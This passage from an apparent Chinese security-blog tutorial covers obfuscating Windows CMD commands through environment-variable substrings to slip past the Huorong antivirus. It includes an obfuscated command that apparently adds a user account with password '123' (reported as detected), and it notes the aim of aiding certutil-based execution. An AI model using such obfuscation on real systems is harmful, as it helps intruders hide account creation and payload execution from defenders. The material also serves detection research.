当然,在这里还可以使用BACK命令回退上一级
%comMonpROGRaMFiLes:~ 22, 1%%COmmOnPrOgramFILES:~ 27, -1%t%PROgrAmFILES:~ 10, -5%%pUblic:~ -5, -4%s%tEmP:~ -3, 1%r
同样可以执行:
3.2 测试添加账号过火绒(失败)
在这里使用添加用户的命令来测试下火绒,因为我这个火绒病毒库没有及时更新,理论上讲不影响我们的操作:
当使用正常的用户添加命令的时候,会报毒:
在这里使用刚刚的工具来试试:
ne%ALLUSERSPROFILE:~12,-1% use%TEMP:~6,1%%CommonProgramW6432:~-6,1%%ALLUSERSPROFILE:~12,-1%e%SystemRoot:~-1,1%%TEMP:~-13,-12% 123 /%LOCALAPPDATA:~-7,1%d%OS:~3,-6%
再试试其他的方法:
还是不行:
添加用户的我已经单独写了一个文章了,后面再发。
4. 总结
对cmd命令的混淆的目的并不是为了在这里添加用户,是为了辅助其他的操作,比如certutil的命令执行等。本文参考了大量的链接,感谢各位师傅的支持。
5. 参考资料
https://update.venuseye.com.cn/reports/1548417941041/%E4%BB%A5Emotet%E4%B8%BA%E4%BE%8B%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90CMD%E5%91%BD%E4%BB%A4%E6%B7%B7%E6%B7%86%E6%8A%80%E6%9C%AF20181212.html https://blog.csdn.net/weixin_45745344/article/details/108088887 https://cloud.tencent.com/developer/article/1633973
